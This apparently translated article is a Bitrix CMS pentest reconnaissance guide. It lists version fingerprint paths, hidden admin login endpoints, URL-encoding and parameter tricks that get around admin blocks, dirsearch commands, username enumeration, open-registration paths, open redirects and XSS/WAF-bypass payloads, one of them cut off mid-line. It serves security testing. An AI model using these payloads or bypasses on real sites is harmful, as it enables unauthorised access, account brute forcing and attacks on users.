01.12.2025
42 min
881
This part details the key stages of Bitrix technical intelligence, explains the fundamental principles of the system, and shows how to identify starting points for potential attacks. The material will help you understand the logic of building the infrastructure, teach you how to determine the platform version, investigate multisite, analyze WAF configuration, and find endpoints that are most often used by attack tools.
1C-Bitrix is one of the most popular (probably already the most popular) CMS in the CIS.
There are several editorial products:
Start
Standard
Small Business
Business
1C-Bitrix24
Online Store + CRM
All editions are based on a single code base with a standard set of functions, which is then simply processed with additional modules and components. Only the name changes and new functionality appears – naturally, for your money.
If a vulnerability is found in the “Start” edition, it will most likely work to a high degree in the “Business” edition. This rule also applies to CRM, although there, according to the product specification form, a user is usually required (albeit with minimal rights) – with rare exceptions.
It is worth mentioning BitrixVM separately – a pre-built virtual machine with automatic installation of any edition of your choice, which has an eye on the security and stability of the system. In some cases, this changes the tactics of attacking the application, although in general the principles of testing are not much different from the self-hosted version.
Bitrix has its own proactive filter (WAF), which has quite good filtering and provides protection against most known web application attacks.
All user input passes through a multitude of recursive filters caused by the fight against various types of vulnerabilities (XSS, LFI, SQLi). That is, in turn, in addition to banal matching, they also perform reverse entity transformation, normalization, decoding and much more. Here, you have to give your all, the security module greatly complicates operation. And sometimes, in general, it cuts good vulnerabilities at the root
The main disadvantage (and for some, a plus) is that the WAF does not work. This opens up opportunities for bypassing protection, which we will talk about in more detail later.
One software complex can be built to work with several domains and subdomains. Which are most often placed in separate directories:
/var/www/html/ = site /var/www/html/subdomain/ = subdomain.site
And part of the Bitrix structure in them is simply linked with symlinks:
In this regard, sometimes we get a detour:
http://site/bitrix/admin/ - 403 http://subdomain.site/bitrix/admin/ - 403 http://site/subdomain/bitrix/admin/ - 200
Now let’s look at the main techniques.
Unfortunately, there is no exact method for determining and editing 1C-Bitrix from the outside. You have to rely on indirect signs. For example:
Presence/absence of specific modules and components
Unique paths to static files
Behavioral features specific to a specific code base
Year in admin panel endpoints
2021 => '/bitrix/js/ui/vue/vue2/dev/src/bitrixvue.js', 2020 => '/bitrix/js/main/parambag/bundle.config.js', 2019 => '/bitrix/js/main/md5/bundle.config.js', 2018 => '/bitrix/js/main/gridtile/gridtile.min.js', 2017 => '/bitrix/js/main/recorder/encoder.js', 2018 => '/bitrix/js/main/pin/pin.js', 2019 => '/bitrix/js/main/usertype.js', 2018 => '/bitrix/js/main/core/core_webrtc.js', 2017 => '/bitrix/js/main/core/core_admin_interface.js', 2016 => '/bitrix/js/main/jquery/jquery-1.7.js', 2015 => '/bitrix/js/main/rating_like.js', 2016 => '/bitrix/js/main/utils.js'
See the authorization form? And there it is.
There are many separate scripts where access is checked. Usually, the script prolog_admin_before.php is responsible for this. In any place where it is connected, we will get an authorization form. With the ability to use a login and password pair in the system, which will be processed by traffic.
Think about the fact that many administrators close the web server access rules to /bitrix/admin/ :
But they do not know (forget) that the attacker has the full login place:
/bitrix/admin/ /%62%69%74%72%69%78/./%61%64%6d%69%6e/index.php /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/tools/autosave.php /bitrix/tools/get_catalog_menu.php /bitrix/tools/upload.php /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php /bitrix/tools/seo_page_parser.php /bitrix/tools/seo_google.php /bitrix/tools/seo_yandex_direct.php /bitrix/tools/seo_yandex.php /bitrix/tools/clock_selector.php /bitrix/modules/forum/install/admin/forum_index.php /bitrix/modules/subscribe/public/subscr_edit.php /bitrix/admin/main_controller.php /bitrix/admin/php_command_line.php /bitrix/components/bitrix/map.yandex.view/settings/settings.php /bitrix/components/bitrix/map.google.view/settings/settings.php /bitrix/components/bitrix/map.google.search/settings/settings.php /bitrix/services/mobileapp/jn.php /randombullchitgo/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
And there are no rate limits on /bitrix/services/mobileapp/jn.php. You can safely brute force.
By the way, in PHP, dots, spaces and [ in query names are automatically renamed to underscores. And “+” to spaces. This allows you to perform some filtering at the web server or WAF level.
For example, using the nginx configuration, access to the admin panel from the Internet was blocked, but there is a feature from Bitrix where you can rewrite the path to which we access via the parameter:
If you do this:
/randombullchitgo/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /randombullchitgo/?SEF`.`APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
Then I will get more endpoints for authorization.
And, of course, the process of finding admins can be automated:
dirsearch -u "https://TARGET.com/bitrix/" -e php -w ~/bitrix-wordlist.txt --full-url --include-extensions=php --force-extensions -r -R 3 --filter "Status: 200" --filter "Size: >0" --filter-regex "Зарегистрироваться"
dirsearch -u "https://TARGET.com/bitrix/" -e php -w ~/bitrix-wordlist.txt --full-url --include-extensions=php --force-extensions -r -R 3 --filter "Status: 200" --filter "Size: >0" --filter-regex "Регистрация"
When you need to check a lot of URLs in Bitrix in bulk, and you are too lazy to manually encode each one in URL-encode, you can configure Burp Suite to automatically line up the submenu.
Go to the Proxy tab → Proxy Settings
At the bottom, find the Match and Replace Rules section
Add two new rules:
Rule 1:
Match: bitrix
Replace: %62%69%74%72%69%78/.(don’t forget the slash /. at the end!)
✅ Regular expression
Rule 2:
Match: admin
Replace:%61%64%6d%69%6e
✅ Regular Expression
Don’t forget to check the boxes next to “Regex”.
Some Bitrix endpoints can expose the internal structure of the server, file paths, module versions, and other technical information. Here is a list of such endpoints:
/bitrix/tools/composite_data.php /bitrix/components/bitrix/main.numerator.edit.sequence/slider.php /bitrix/services/main/ajax.php /bitrix/services/mobileapp/jn.php /bitrix/modules/main/admin/php_command_line.php /?USER_FIELD_MANAGER=1 /bitrix/admin/restore_export.php /bitrix/admin/tools_index.php /bitrix/bitrix.php /bitrix/modules/main/ajax_tools.php /bitrix/php_interface/after_connect_d7.php /bitrix/themes/.default/.description.php /bitrix/components/bitrix/main.ui.selector/templates/.default/template.php /bitrix/components/bitrix/forum.user.profile.edit/templates/.default/interface.php /bitrix/wizards/bitrix/demo/public_files/ru/personal/desktop.php /bitrix/php_interface/dbquery_error.php /bitrix/templates/.default/subscribe/subscr_form.php
A simple, reflected content substitution that you can only look for to praise your anime gif on someone else’s site or add a +1 to a low bug in a pentest report. There’s no way to promote it further.
/bitrix/components/bitrix/mobileapp.list/ajax.php?items[1][TITLE]=TEXT+INJECTION!+PLEASE+CLICK+HERE!&items[1][DETAIL_LINK]=http://google.com
/bitrix/tools/imagepg.php?img=//ceblog.s3.amazonaws.com/wp-content/uploads/2016/04/22110359/youve-been-hacked.png
/bitrix/templates/learning/js/swfpg.php?img=//evil.host/evil.swf
By default, we can’t see a list of user logins anywhere. But using this flaw, you can go through the dictionary and try to tweak them. So, when requesting a valid login, the application will respond with the string BITRIX_SM_UIDH=deleted:
GET /bitrix/tools/upload.php HTTP/1.1 Host: bitrix User-Agent: Mozilla/5.0 Cookie: BITRIX_SM_UIDL=admin; BITRIX_SM_UIDH=1;
If this doesn’t work, in almost all versions of Bitrix you can still change users through the password change form.
/bitrix/admin/index.php#change_password
In case the user exists, the error will change.
Sometimes you can access the Bitrix admin panel simply by registering. Many of them don’t have a registration button, but that doesn’t stop us from calling standard forms.
/auth/?register=yes /crm/?register=yes /auth/oauth2/?register=yes /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/public_files/en/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/en/examples/custom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/en/examples/my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subscr_edit.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/en/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/board/my/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/en/board/my/index.php?register=yes /bitrix/wizards/bitrix/demo/indexes/ru/cancel/?register=yes /bitrix/wizards/bitrix/demo/indexes/en/cancel/?register=yes
By the way, the presence of forms is also not mandatory, it is enough to solve the captcha (if there is one) and send a POST request to the reg.
After registration (received a valid session ID), you can browse the /bitrix/ directory
It is difficult to say exactly why redirect.php still remains in the product – the logic of this decision is unclear. And there is no point in delving into the developers’ motivations in detail.
/bitrix/redirect.php?goto=https://TARGET%252F:[email protected]/ /bitrix/rk.php?goto=https://TARGET%252F:[email protected]/ /bitrix/tools/track_mail_click.php?url=http://site%[email protected]/ /bitrix/redirect.php?goto=https://TARGET.com%252F:[email protected]/
Works mostly on older versions of Bitrix, but even if successful, you will probably get a warning.
Trivial XSS, can attack authenticated users.
/bitrix/components/bitrix/map.google.view/settings/settings.php?arParams[API_KEY]=123'-'%00'-alert(document.domain)-'
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00'}};alert(document.domain);if(1){//
/waf-bypass.php?page=BYPASS%00")});alert(1);$(document).ready(function%20(){%2f%2f
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27a%27%2B%27lert%27](document.domain);if(1){//
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_r
The first part of the Bitrix audit shows how much useful information can be obtained before moving on to more complex attacks. Even without exploits and searching for critical vulnerabilities, the platform reveals a lot of technical details through the behavior of its own components, multi-site features, weak authorization parameters and various service endpoints. It is these small but systemic flaws that create the basis for further escalation of access.
Intelligence, WAF analysis, version determination, search for hidden access points and testing for XSS, SSRF and LFI form the foundation of a practical Bitrix pentest. If these steps are performed correctly, the next stage – working with critical vulnerabilities and exploits – becomes much more efficient and accurate.
Next, we will move on to the second part, where we will consider real hacking tactics, RCE vulnerabilities, bypassing protection and methods for complete system compromise.